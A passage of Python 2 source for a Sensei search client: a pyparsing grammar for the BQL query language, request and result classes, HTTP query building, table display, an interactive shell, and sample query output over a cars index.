facet_order_by = HITS | VALUE
facet_spec = Group(column_name +
Optional(LPAR + expand_flag + COMMA + int_num + COMMA + int_num + COMMA + facet_order_by + RPAR))
group_by_clause = (GROUP + BY +
column_name.setResultsName("groupby") +
Optional(TOP + int_num.setResultsName("max_per_group"))).setParseAction(group_by_once)
browse_by_clause = (BROWSE + BY +
delimitedList(facet_spec).setResultsName("facet_specs")).setParseAction(browse_by_once)
fetching_flag = TRUE | FALSE
fetching_stored_clause = (FETCHING + STORED +
Optional(fetching_flag)).setResultsName("fetching_stored").setParseAction(fetching_stored_once)
additional_clause = (order_by_clause
| limit_clause
| group_by_clause
| browse_by_clause
| fetching_stored_clause
)
additional_clauses = ZeroOrMore(additional_clause)
select_stmt << (SELECT +
('*' | column_name_list).setResultsName("columns") +
FROM +
ident.setResultsName("index") +
Optional(WHERE + search_condition.setResultsName("where")) +
Optional(given_clause.setResultsName("given")) +
additional_clauses
)
describe_stmt = (DESC | DESCRIBE).setResultsName("describe") + ident.setResultsName("index")
BQLstmt = (select_stmt | describe_stmt) + Optional(SEMICOLON)
# Define comment format, and ignore them
sql_comment = "--" + restOfLine
BQLstmt.ignore(sql_comment)
def safe_str(obj):
"""Return the byte string representation of obj."""
try:
return str(obj)
except UnicodeEncodeError:
# obj is unicode
return unicode(obj).encode("unicode_escape")
def merge_values(list1, list2):
"""Merge two list and dedup."""
tmp = list1[:]
if not tmp:
return list2
else:
tmp.extend(list2)
return list(set(tmp))
def collapse_cumulative_preds(cumulative_preds):
"""Collapse cumulative predicates into one selection."""
# XXX Need to consider props here too
select = None
selections = []
field = None
for pred in cumulative_preds:
tmp = build_selection(pred)
if not field and tmp:
field = tmp.field
elif tmp.field != field:
raise SenseiClientError("A different column '%s' appeared in cumulative predicates"
% tmp.field)
elif tmp.excludes:
raise SenseiClientError("Negative predicate for column '%s' appeared in cumulative predicates"
% tmp.field)
selections.append(tmp)
if not selections:
select = None
elif len(selections) == 1:
select = selections[0]
else:
values = selections[0].values
select = SenseiSelection(field, PARAM_SELECT_OP_OR)
for i in xrange(1, len(selections)):
values = merge_values(values, selections[i].values)
select.values = values
return select
def build_selection(predicate):
"""Build a SenseiSelection based on a predicate."""
select = None
if predicate.in_pred:
select = SenseiSelection(predicate[0], PARAM_SELECT_OP_OR)
is_not = predicate[1] == NOT.match
for val in predicate.value_list:
select.addSelection(val, is_not)
for val in predicate.except_values:
select.addSelection(val, not is_not)
for i in xrange(0, len(predicate.prop_list), 2):
select.addProperty(predicate.prop_list[i], predicate.prop_list[i+1])
elif predicate.contains_all_pred:
select = SenseiSelection(predicate[0], PARAM_SELECT_OP_AND)
for val in predicate.value_list:
select.addSelection(val)
for val in predicate.except_values:
select.addSelection(val, True)
for i in xrange(0, len(predicate.prop_list), 2):
select.addProperty(predicate.prop_list[i], predicate.prop_list[i+1])
elif predicate.equal_pred:
select = SenseiSelection(predicate[0], PARAM_SELECT_OP_AND)
select.addSelection(predicate[2])
for i in xrange(0, len(predicate.prop_list), 2):
select.addProperty(predicate.prop_list[i], predicate.prop_list[i+1])
elif predicate.not_equal_pred:
select = SenseiSelection(predicate[0], PARAM_SELECT_OP_OR)
select.addSelection(predicate[2], True)
for i in xrange(0, len(predicate.prop_list), 2):
select.addProperty(predicate.prop_list[i], predicate.prop_list[i+1])
elif predicate.between_pred:
if predicate[1] == BETWEEN.match:
select = SenseiSelection(predicate[0], PARAM_SELECT_OP_OR)
select.addSelection("[%s TO %s]" % (predicate[2], predicate[4]))
else:
select = SenseiSelection(predicate[0], PARAM_SELECT_OP_OR)
select.addSelection("[%s TO %s]" % (predicate[3], predicate[5]), True)
elif predicate.same_column_or_pred:
select = collapse_cumulative_preds(predicate.cumulative_preds)
return select
class BQLRequest:
"""A Sensei request with a BQL statement.
The BQL statement can be one of the following statements:
1. SELECT
2. DESCRIBE
"""
def __init__(self, sql_stmt):
try:
self.tokens = BQLstmt.parseString(sql_stmt, parseAll=True)
except ParseException as err:
raise err
finally:
reset_all()
self.query = ""
self.selections = None
self.selection_list = []
self.sorts = None
self.columns = [safe_str(col) for col in self.tokens.columns]
self.facet_init_param_map = None
if self.tokens.describe:
self.stmt_type = "desc"
else:
self.stmt_type = "select"
where = self.tokens.where
if where:
if where.predicates:
for predicate in where.predicates:
if predicate.query_pred:
self.query = predicate[2]
else:
select = build_selection(predicate)
if select:
self.selection_list.append(select)
elif where.cumulative_preds:
select = collapse_cumulative_preds(where.cumulative_preds)
self.selection_list.append(select)
def get_stmt_type(self):
"""Get the statement type."""
return self.stmt_type
def get_offset(self):
"""Get the offset."""
limit = self.tokens.limit
if limit:
if len(limit[1]) == 2:
return limit[1][0]
else:
return None
else:
return None
def get_count(self):
"""Get the count (default 10)."""
limit = self.tokens.limit
if limit:
if len(limit[1]) == 2:
return limit[1][1]
else:
return limit[1][0]
else:
return None
def get_index(self):
"""Get the index (i.e. table) name."""
return self.tokens.index
def get_columns(self):
"""Get the list of selected columns."""
return self.columns
def get_query(self):
"""Get the query string."""
return self.query
def get_sorts(self):
"""Get the SenseiSort array base on ORDER BY."""
if self.sorts:
return self.sorts
self.sorts = []
orderby = self.tokens.orderby
if orderby:
orderby_spec = orderby.orderby_spec
for spec in orderby_spec:
if len(spec) == 1:
self.sorts.append(SenseiSort(spec[0]))
else:
self.sorts.append(SenseiSort(spec[0], spec[1] == "desc"))
return self.sorts
def merge_selections(self):
"""Merge all selections and detect conflicts."""
self.selections = {}
for select in self.selection_list:
existing = self.selections.get(select.field)
if existing:
if existing.values and select.values:
return False, "There is conflict in selection(s) for column '%s'" % select.field
if select.values:
existing.values = select.values
if select.excludes:
existing.excludes = merge_values(existing.excludes,
select.excludes)
# XXX How about props?
else:
self.selections[select.field] = select
return True, None
def get_selections(self):
"""Get all the selections from in statement."""
if self.selections == None:
merge_selections()
return self.selections
def get_facets(self):
"""Get facet specs."""
facet_specs = self.tokens.facet_specs
if not facet_specs:
return {}
facets = {}
for spec in facet_specs:
facet = None
if len(spec) == 1:
facet = SenseiFacet(False,
DEFAULT_FACET_MINHIT,
DEFAULT_FACET_MAXHIT,
DEFAULT_FACET_ORDER)
else:
facet = SenseiFacet(spec[1] == "true",
spec[2],
spec[3],
spec[4] == "hits" and PARAM_FACET_ORDER_HITS or PARAM_FACET_ORDER_VAL)
facets[spec[0]] = facet
return facets
def get_groupby(self):
"""Get group by facet name."""
if self.tokens.groupby:
return self.tokens.groupby[0]
else:
return None
def get_max_per_group(self):
"""Get max_per_group value."""
if self.tokens.max_per_group:
return self.tokens.max_per_group
else:
return None
def get_fetching_stored(self):
"""Get the fetching-stored flag."""
fetching_stored = self.tokens.fetching_stored
if (not fetching_stored or
len(fetching_stored) == 2 or
fetching_stored[2] == "true"):
return True
else:
return False
def get_facet_init_param_map(self):
"""Get run-time facet handler initialization parameters."""
if self.facet_init_param_map:
return self.facet_init_param_map
self.facet_init_param_map = {}
given = self.tokens.given
if given:
for param in given.facet_param:
facet = param[0]
name = param[1]
param_type = param[2]
value = param[3]
init_param = SenseiFacetInitParams()
if param_type == "boolean":
init_param.put_bool_param(name, value)
elif param_type == "int":
init_param.put_int_param(name, value)
elif param_type == "long":
init_param.put_long_param(name, value)
elif param_type == "string":
init_param.put_string_param(name, value)
elif param_type == "bytearray":
init_param.put_byte_param(name, value)
elif param_type == "double":
init_param.put_double_param(name, value)
self.facet_init_param_map[facet] = init_param
return self.facet_init_param_map
def test(str):
try:
tokens = BQLstmt.parseString(str)
print "tokens =", tokens
print "tokens.columns =", tokens.columns
print "tokens.index =", tokens.index
print "tokens.where =", tokens.where
if tokens.where:
print "tokens.where.predicates =", tokens.where.predicates
print "tokens.where.cumulative_preds =", tokens.where.cumulative_preds
for predicate in tokens.where.predicates:
print "--------------------------------------"
print "predicate.value_list =", predicate.value_list
print "predicate.except_values =", predicate.except_values
print "predicate.prop_list =", predicate.prop_list
if predicate.cumulative_preds:
print "predicate.cumulative_preds =", predicate.cumulative_preds
print "tokens.orderby =", tokens.orderby
if tokens.orderby:
print "tokens.orderby.orderby_spec =", tokens.orderby.orderby_spec
print "tokens.limit =", tokens.limit
print "tokens.facet_specs =", tokens.facet_specs
print "tokens.groupby =", tokens.groupby
print "tokens.max_per_group =", tokens.max_per_group
print "tokens.given =", tokens.given
if tokens.given:
print "tokens.given.facet_param =", tokens.given.facet_param
print "tokens.fetching_stored =", tokens.fetching_stored
except ParseException as err:
# print " " * (err.loc + 2) + "^\n" + err.msg
pass
finally:
reset_all()
class SenseiClientError(Exception):
"""Exception raised for all errors related to Sensei client."""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class SenseiFacet:
def __init__(self,expand=False,minHits=1,maxCounts=10,orderBy=PARAM_FACET_ORDER_HITS):
self.expand = expand
self.minHits = minHits
self.maxCounts = maxCounts
self.orderBy = orderBy
class SenseiSelection:
def __init__(self, field, operation=PARAM_SELECT_OP_OR):
self.field = field
self.operation = operation
self.values = []
self.excludes = []
self.properties = {}
def __str__(self):
return ("Selection:%s:%s:%s:%s" %
(self.field, self.operation,
','.join(self.values), ','.join(self.excludes)))
def addSelection(self, value, isNot=False):
if isNot:
self.excludes.append(safe_str(value))
else:
self.values.append(safe_str(value))
def removeSelection(self, value, isNot=False):
if isNot:
self.excludes.remove(safe_str(value))
else:
self.values.remove(safe_str(value))
def addProperty(self, name, value):
self.properties[name] = value
def removeProperty(self, name):
del self.properties[name]
def getSelectNotParam(self):
return "%s.%s.%s" % (PARAM_SELECT, self.field, PARAM_SELECT_NOT)
def getSelectNotParamValues(self):
return ",".join(self.excludes)
def getSelectOpParam(self):
return "%s.%s.%s" % (PARAM_SELECT, self.field, PARAM_SELECT_OP)
def getSelectValParam(self):
return "%s.%s.%s" % (PARAM_SELECT, self.field, PARAM_SELECT_VAL)
def getSelectValParamValues(self):
return ",".join(self.values)
def getSelectPropParam(self):
return "%s.%s.%s" % (PARAM_SELECT, self.field, PARAM_SELECT_PROP)
def getSelectPropParamValues(self):
return ",".join(key + ":" + self.properties.get(key)
for key in self.properties.keys())
class SenseiSort:
def __init__(self, field, reverse=False):
self.field = field
self.dir = None
if not (field == PARAM_SORT_SCORE or
field == PARAM_SORT_SCORE_REVERSE or
field == PARAM_SORT_DOC or
field == PARAM_SORT_DOC_REVERSE):
if reverse:
self.dir = PARAM_SORT_DESC
else:
self.dir = PARAM_SORT_ASC
def __str__(self):
return self.buildSortField()
def buildSortField(self):
if self.dir:
return self.field + ":" + self.dir
else:
return self.field
class SenseiFacetInitParams:
"""FacetHandler initialization parameters."""
def __init__(self):
self.bool_map = {}
self.int_map = {}
self.long_map = {}
self.string_map = {}
self.byte_map = {}
self.double_map = {}
# Getters for param names for different types
def get_bool_param_names(self):
return self.bool_map.keys()
def get_int_param_names(self):
return self.int_map.keys()
def get_long_param_names(self):
return self.long_map.keys()
def get_string_param_names(self):
return self.string_map.keys()
def get_byte_param_names(self):
return self.byte_map.keys()
def get_double_param_names(self):
return self.double_map.keys()
# Add param name, values
def put_bool_param(self, key, value):
if isinstance(value, list):
self.bool_map[key] = value
else:
self.bool_map[key] = [value]
def put_int_param(self, key, value):
if isinstance(value, list):
self.int_map[key] = value
else:
self.int_map[key] = [value]
def put_long_param(self, key, value):
if isinstance(value, list):
self.long_map[key] = value
else:
self.long_map[key] = [value]
def put_string_param(self, key, value):
if isinstance(value, list):
self.string_map[key] = value
else:
self.string_map[key] = [value]
def put_byte_param(self, key, value):
if isinstance(value, list):
self.byte_map[key] = value
else:
self.byte_map[key] = [value]
def put_double_param(self, key, value):
if isinstance(value, list):
self.double_map[key] = value
else:
self.double_map[key] = [value]
# Getters of param value(s) based on param names
def get_bool_param(self, key):
return self.bool_map.get(key)
def get_int_param(self, key):
return self.int_map.get(key)
def get_long_param(self, key):
return self.long_map.get(key)
def get_string_param(self, key):
return self.string_map.get(key)
def get_byte_param(self, key):
return self.byte_map.get(key)
def get_double_param(self, key):
return self.double_map.get(key)
class SenseiFacetInfo:
def __init__(self, name, runtime=False, props={}):
self.name = name
self.runtime = runtime
self.props = props
def get_name(self):
return self.name
def set_name(self, name):
self.name = name
def get_runtime(self):
return self.runtime
def set_runtime(self, runtime):
self.runtime = runtime
def get_props(self):
return self.props
def set_props(self, props):
self.props = props
class SenseiNodeInfo:
def __init__(self, id, partitions, node_link, admin_link):
self.id = id
self.partitions = partitions
self.node_link = node_link
self.admin_link = admin_link
def get_id(self):
return self.id
def get_partitions(self):
return self.partitions
def get_node_link(self):
return self.node_link
def get_admin_link(self):
return self.admin_link
class SenseiSystemInfo:
def __init__(self, json_data):
logger.debug("json_data = %s" % json_data)
self.num_docs = int(json_data.get(PARAM_SYSINFO_NUMDOCS))
self.last_modified = long(json_data.get(PARAM_SYSINFO_LASTMODIFIED))
self.version = json_data.get(PARAM_SYSINFO_VERSION)
self.facet_infos = []
for facet in json_data.get(PARAM_SYSINFO_FACETS):
facet_info = SenseiFacetInfo(facet.get(PARAM_SYSINFO_FACETS_NAME),
facet.get(PARAM_SYSINFO_FACETS_RUNTIME),
facet.get(PARAM_SYSINFO_FACETS_PROPS))
self.facet_infos.append(facet_info)
# TODO: get cluster_info
self.cluster_info = None
def display(self):
"""Display sysinfo."""
keys = ["facet_name", "facet_type", "runtime", "column", "column_type", "depends"]
max_lens = None
# XXX add existing flags
def get_max_lens(columns):
max_lens = {}
for column in columns:
max_lens[column] = len(column)
for facet_info in self.facet_infos:
props = facet_info.get_props()
tmp_len = len(facet_info.get_name())
if tmp_len > max_lens["facet_name"]:
max_lens["facet_name"] = tmp_len
tmp_len = len(props.get("type"))
if tmp_len > max_lens["facet_type"]:
max_lens["facet_type"] = tmp_len
# runtime can only contain "true" or "false", so len("runtime")
# is big enough
tmp_len = len(props.get("column"))
if tmp_len > max_lens["column"]:
max_lens["column"] = tmp_len
tmp_len = len(props.get("column_type"))
if tmp_len > max_lens["column_type"]:
max_lens["column_type"] = tmp_len
tmp_len = len(props.get("depends"))
if tmp_len > max_lens["depends"]:
max_lens["depends"] = tmp_len
return max_lens
def print_line(char='-', sep_char='+'):
sys.stdout.write(sep_char)
for key in keys:
sys.stdout.write(char * (max_lens[key] + 2) + sep_char)
sys.stdout.write('\n')
def print_header():
print_line('-', '+')
sys.stdout.write('|')
for key in keys:
sys.stdout.write(' %s%s |' % (key, ' ' * (max_lens[key] - len(key))))
sys.stdout.write('\n')
print_line('-', '+')
def print_footer():
print_line('-', '+')
max_lens = get_max_lens(keys)
print_header()
for facet_info in self.facet_infos:
props = facet_info.get_props()
sys.stdout.write('|')
val = facet_info.get_name()
sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["facet_name"] - len(val))))
val = props.get("type")
sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["facet_type"] - len(val))))
val = facet_info.get_runtime() and "true" or "false"
sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["runtime"] - len(val))))
val = props.get("column")
sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["column"] - len(val))))
val = props.get("column_type")
sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["column_type"] - len(val))))
val = props.get("depends")
sys.stdout.write(' %s%s |' % (val, ' ' * (max_lens["depends"] - len(val))))
sys.stdout.write('\n')
print_footer()
def get_num_docs(self):
return self.num_docs
def set_num_docs(self, num_docs):
self.num_docs = num_docs
def get_last_modified(self):
return self.last_modified
def set_last_modified(self, last_modified):
self.last_modified = last_modified
def get_facet_infos(self):
return self.facet_infos
def set_facet_infos(self, facet_infos):
self.facet_infos = facet_infos
def get_version(self):
return self.version
def set_version(self, version):
self.version = version
def get_cluster_info(self):
return self.cluster_info
def set_cluster_info(self, cluster_info):
self.cluster_info = cluster_info
class SenseiRequest:
def __init__(self,
sql_stmt=None,
offset=DEFAULT_REQUEST_OFFSET,
count=DEFAULT_REQUEST_COUNT,
max_per_group=DEFAULT_REQUEST_MAX_PER_GROUP):
self.qParam = {}
self.explain = False
self.route_param = None
self.sql_stmt = sql_stmt
self.prepare_time = 0 # Statement prepare time in milliseconds
self.stmt_type = "unknown"
if sql_stmt != None:
time1 = datetime.datetime.now()
bql_req = BQLRequest(sql_stmt)
ok, msg = bql_req.merge_selections()
if not ok:
raise SenseiClientError(msg)
self.stmt_type = bql_req.get_stmt_type()
if self.stmt_type == "desc":
self.index = bql_req.get_index()
else:
self.query = bql_req.get_query()
self.offset = bql_req.get_offset() or offset
self.count = bql_req.get_count() or count
self.columns = bql_req.get_columns()
self.sorts = bql_req.get_sorts()
self.selections = bql_req.get_selections()
self.facets = bql_req.get_facets()
# PARAM_RESULT_HIT_STORED_FIELDS is a reserved column name. If this
# column is selected, turn on fetch_stored flag automatically.
if (PARAM_RESULT_HIT_STORED_FIELDS in self.columns or
bql_req.get_fetching_stored()):
self.fetch_stored = True
else:
self.fetch_stored = False
self.groupby = bql_req.get_groupby()
self.max_per_group = bql_req.get_max_per_group() or max_per_group
self.facet_init_param_map = bql_req.get_facet_init_param_map()
delta = datetime.datetime.now() - time1
self.prepare_time = delta.seconds * 1000 + delta.microseconds / 1000
logger.debug("Prepare time: %sms" % self.prepare_time)
else:
self.query = None
self.offset = offset
self.count = count
self.columns = []
self.sorts = None
self.selections = {}
self.facets = {}
self.fetch_stored = False
self.groupby = None
self.max_per_group = max_per_group
self.facet_init_param_map = {}
def get_columns(self):
return self.columns
# XXX Do we really need this class?
class SenseiHit:
def __init__(self):
self.docid = None
self.uid = None
self.srcData = {}
self.score = None
self.explanation = None
self.stored = None
def load(self, jsonHit):
self.docid = jsonHit.get(PARAM_RESULT_HIT_DOCID)
self.uid = jsonHit.get(PARAM_RESULT_HIT_UID)
self.score = jsonHit.get(PARAM_RESULT_HIT_SCORE)
srcStr = jsonHit.get(PARAM_RESULT_HIT_SRC_DATA)
self.explanation = jsonHit.get(PARAM_RESULT_HIT_EXPLANATION)
self.stored = jsonHit.get(PARAM_RESULT_HIT_STORED_FIELDS)
if srcStr:
self.srcData = json.loads(srcStr)
else:
self.srcData = None
class SenseiResultFacet:
value = None
count = None
selected = None
def load(self,json):
self.value=json.get(PARAM_RESULT_FACET_INFO_VALUE)
self.count=json.get(PARAM_RESULT_FACET_INFO_COUNT)
self.selected=json.get(PARAM_RESULT_FACET_INFO_SELECTED,False)
class SenseiResult:
"""Sensei search results for a query."""
def __init__(self, json_data):
logger.debug("json_data = %s" % json_data)
self.jsonMap = json_data
self.parsedQuery = json_data.get(PARAM_RESULT_PARSEDQUERY)
self.totalDocs = json_data.get(PARAM_RESULT_TOTALDOCS, 0)
self.time = json_data.get(PARAM_RESULT_TIME, 0)
self.total_time = 0
self.numHits = json_data.get(PARAM_RESULT_NUMHITS, 0)
self.hits = json_data.get(PARAM_RESULT_HITS)
map = json_data.get(PARAM_RESULT_FACETS)
self.facetMap = {}
if map:
for k, v in map.items():
facetList = []
for facet in v:
facetObj = SenseiResultFacet()
facetObj.load(facet)
facetList.append(facetObj)
self.facetMap[k]=facetList
def display(self, columns=['*'], max_col_width=40):
"""Print the results in SQL SELECT result format."""
keys = []
max_lens = None
has_group_hits = False
def get_max_lens(columns):
max_lens = {}
has_group_hits = False
for col in columns:
max_lens[col] = len(col)
for hit in self.hits:
group_hits = [hit]
if hit.has_key(GROUP_HITS):
group_hits = hit.get(GROUP_HITS)
has_group_hits = True
for group_hit in group_hits:
for col in columns:
if group_hit.has_key(col):
v = group_hit.get(col)
else:
v = '<Not Found>'
if isinstance(v, list):
v = ','.join([safe_str(item) for item in v])
elif isinstance(v, (int, long, float)):
v = str(v)
value_len = len(v)
if value_len > max_lens[col]:
max_lens[col] = min(value_len, max_col_width)
return max_lens, has_group_hits
def print_line(char='-', sep_char='+'):
sys.stdout.write(sep_char)
for key in keys:
sys.stdout.write(char * (max_lens[key] + 2) + sep_char)
sys.stdout.write('\n')
def print_header():
if has_group_hits:
print_line('=', '=')
else:
print_line('-', '+')
sys.stdout.write('|')
for key in keys:
sys.stdout.write(' %s%s |' % (key, ' ' * (max_lens[key] - len(key))))
sys.stdout.write('\n')
if has_group_hits:
print_line('=', '=')
else:
print_line('-', '+')
def print_footer():
if has_group_hits:
print_line('=', '=')
else:
print_line('-', '+')
sys.stdout.write('%s %s%s in set, %s hit%s, %s total doc%s (server: %sms, total: %sms)\n' %
(len(self.hits),
has_group_hits and 'group' or 'row',
len(self.hits) > 1 and 's' or '',
self.numHits,
self.numHits > 1 and 's' or '',
self.totalDocs,
self.totalDocs > 1 and 's' or '',
self.time,
self.total_time
))
if not self.hits:
print "No hit is found."
return
elif not columns:
print "No column is selected."
return
if len(columns) == 1 and columns[0] == '*':
keys = self.hits[0].keys()
if GROUP_HITS in keys:
keys.remove(GROUP_HITS)
if GROUP_VALUE in keys:
keys.remove(GROUP_VALUE)
if PARAM_RESULT_HIT_SRC_DATA in keys:
keys.remove(PARAM_RESULT_HIT_SRC_DATA)
else:
keys = columns
max_lens, has_group_hits = get_max_lens(keys)
print_header()
# Print the results
for hit in self.hits:
group_hits = [hit]
if hit.has_key(GROUP_HITS):
group_hits = hit.get(GROUP_HITS)
for group_hit in group_hits:
sys.stdout.write('|')
for key in keys:
if group_hit.has_key(key):
v = group_hit.get(key)
else:
v = '<Not Found>'
if isinstance(v, list):
v = ','.join([safe_str(item) for item in v])
elif isinstance(v, (int, float, long)):
v = str(v)
else:
# The value may contain unicode characters
v = safe_str(v)
if len(v) > max_col_width:
v = v[:max_col_width]
sys.stdout.write(' %s%s |' % (v, ' ' * (max_lens[key] - len(v))))
sys.stdout.write('\n')
if has_group_hits:
print_line()
# Print the result footer
print_footer()
# Print facet information
for facet, values in self.jsonMap.get(PARAM_RESULT_FACETS).iteritems():
max_val_len = len(facet)
max_count_len = 1
for val in values:
max_val_len = max(max_val_len, min(max_col_width, len(val.get('value'))))
max_count_len = max(max_count_len, len(str(val.get('count'))))
total_len = max_val_len + 2 + max_count_len + 3
sys.stdout.write('+' + '-' * total_len + '+\n')
sys.stdout.write('| ' + facet + ' ' * (total_len - len(facet) - 1) + '|\n')
sys.stdout.write('+' + '-' * total_len + '+\n')
for val in values:
sys.stdout.write('| %s%s (%s)%s |\n' %
(val.get('value'),
' ' * (max_val_len - len(val.get('value'))),
val.get('count'),
' ' * (max_count_len - len(str(val.get('count'))))))
sys.stdout.write('+' + '-' * total_len + '+\n')
class SenseiClient:
"""Sensei client class."""
def __init__(self,host='localhost',port=8080,path='sensei'):
self.host = host
self.port = port
self.path = path
self.url = 'http://%s:%d/%s' % (self.host,self.port,self.path)
self.opener = urllib2.build_opener()
self.opener.addheaders = [('User-agent', 'Python-urllib/2.5')]
self.opener.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30')]
@staticmethod
def buildUrlString(req):
paramMap = {}
paramMap[PARAM_OFFSET] = req.offset
paramMap[PARAM_COUNT] = req.count
if req.query:
paramMap[PARAM_QUERY]=req.query
if req.explain:
paramMap[PARAM_SHOW_EXPLAIN] = "true"
if req.fetch_stored:
paramMap[PARAM_FETCH_STORED] = "true"
if req.route_param:
paramMap[PARAM_ROUTE_PARAM] = req.route_param
# paramMap["offset"] = req.offset
# paramMap["count"] = req.count
if req.sorts:
paramMap[PARAM_SORT] = ",".join(sort.buildSortField() for sort in req.sorts)
if req.qParam.get("query"):
paramMap[PARAM_QUERY] = req.qParam.get("query")
del req.qParam["query"]
if req.qParam:
paramMap[PARAM_QUERY_PARAM] = ",".join(param + ":" + req.qParam.get(param)
for param in req.qParam.keys() if param != "query")
for selection in req.selections.values():
paramMap[selection.getSelectNotParam()] = selection.getSelectNotParamValues()
paramMap[selection.getSelectOpParam()] = selection.operation
paramMap[selection.getSelectValParam()] = selection.getSelectValParamValues()
if selection.properties:
paramMap[selection.getSelectPropParam()] = selection.getSelectPropParamValues()
for facet_name, facet_spec in req.facets.iteritems():
paramMap["%s.%s.%s" % (PARAM_FACET, facet_name, PARAM_FACET_MAX)] = facet_spec.maxCounts
paramMap["%s.%s.%s" % (PARAM_FACET, facet_name, PARAM_FACET_ORDER)] = facet_spec.orderBy
paramMap["%s.%s.%s" % (PARAM_FACET, facet_name, PARAM_FACET_EXPAND)] = facet_spec.expand and "true" or "false"
paramMap["%s.%s.%s" % (PARAM_FACET, facet_name, PARAM_FACET_MINHIT)] = facet_spec.minHits
for facet_name, initParams in req.facet_init_param_map.iteritems():
for name, vals in initParams.bool_map.iteritems():
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_BOOL
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name,
PARAM_DYNAMIC_VAL)] = ','.join([val and "true" or "false" for val in vals])
for name, vals in initParams.int_map.iteritems():
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_INT
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name,
PARAM_DYNAMIC_VAL)] = ','.join([safe_str(val) for val in vals])
for name, vals in initParams.long_map.iteritems():
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_LONG
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name,
PARAM_DYNAMIC_VAL)] = ','.join([safe_str(val) for val in vals])
for name, vals in initParams.string_map.iteritems():
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_STRING
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name,
PARAM_DYNAMIC_VAL)] = ','.join(vals)
for name, vals in initParams.byte_map.iteritems():
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_BYTEARRAY
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name,
PARAM_DYNAMIC_VAL)] = ','.join([safe_str(val) for val in vals])
for name, vals in initParams.double_map.iteritems():
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_DOUBLE
paramMap["%s.%s.%s.%s" %
(PARAM_DYNAMIC_INIT, facet_name, name,
PARAM_DYNAMIC_VAL)] = ','.join([safe_str(val) for val in vals])
if req.groupby:
paramMap[PARAM_GROUP_BY] = req.groupby
if req.max_per_group > 0:
paramMap[PARAM_MAX_PER_GROUP] = req.max_per_group
return urllib.urlencode(paramMap)
def doQuery(self, req=None):
"""Execute a search query."""
time1 = datetime.datetime.now()
paramString = None
if req:
paramString = SenseiClient.buildUrlString(req)
logger.debug(paramString)
urlReq = urllib2.Request(self.url, paramString)
res = self.opener.open(urlReq)
line = res.read()
jsonObj = json.loads(line)
res = SenseiResult(jsonObj)
delta = datetime.datetime.now() - time1
res.total_time = delta.seconds * 1000 + delta.microseconds / 1000
return res
def getSystemInfo(self):
"""Get Sensei system info."""
urlReq = urllib2.Request(self.url + "/sysinfo")
res = self.opener.open(urlReq)
line = res.read()
jsonObj = json.loads(line)
res = SenseiSystemInfo(jsonObj)
return res
def main(argv):
print "Welcome to Sensei Shell"
from optparse import OptionParser
usage = "usage: %prog [options]"
parser = OptionParser(usage=usage)
parser.add_option("-w", "--column-width", dest="max_col_width",
default=100, help="Set the max column width")
parser.add_option("-v", "--verbose", action="store_true", dest="verbose",
default=False, help="Turn on verbose mode")
(options, args) = parser.parse_args()
if options.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(filename)s:%(lineno)d - %(message)s")
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
if len(args) <= 1:
client = SenseiClient()
print "using default host=localhsot, port=8080"
else:
host = args[0]
port = int(args[1])
logger.debug("Url specified, host: %s, port: %d" % (host,port))
print "Url specified, host: %s, port: %d" % (host,port)
client = SenseiClient(host, port, 'sensei')
import readline
readline.parse_and_bind("tab: complete")
while 1:
try:
stmt = raw_input('> ')
if stmt == "exit":
break
if options.verbose:
test(stmt)
req = SenseiRequest(stmt)
if req.stmt_type == "select":
res = client.doQuery(req)
res.display(columns=req.get_columns(), max_col_width=int(options.max_col_width))
elif req.stmt_type == "desc":
sysinfo = client.getSystemInfo()
sysinfo.display()
else:
pass
except EOFError:
break
except ParseException as err:
print " " * (err.loc + 2) + "^\n" + err.msg
except SenseiClientError as err:
print err
if __name__ == "__main__":
main(sys.argv)
"""
Testing Data:
select color, year, tags, price from cars where query is "cool" and color in ("gold", "green", "blue") except ("black", "blue", "yellow", "white", "red", "silver") and year in ("[1996 TO 1997]", "[2002 TO 2003]") order by price desc limit 0,10
+-------+----------------------+----------------------------------+-------------------------+
| color | year | tags | price |
+-------+----------------------+----------------------------------+-------------------------+
| gold | 00000000000000001997 | cool,moon-roof,reliable,towing | 00000000000000015000.00 |
| green | 00000000000000001996 | cool,favorite,reliable,towing | 00000000000000015000.00 |
| green | 00000000000000001996 | cool,favorite,reliable,towing | 00000000000000014800.00 |
| green | 00000000000000001996 | cool,moon-roof,reliable,towing | 00000000000000014800.00 |
| green | 00000000000000002002 | automatic,cool,reliable,towing | 00000000000000014800.00 |
| gold | 00000000000000002002 | cool,favorite,navigation,towing | 00000000000000014700.00 |
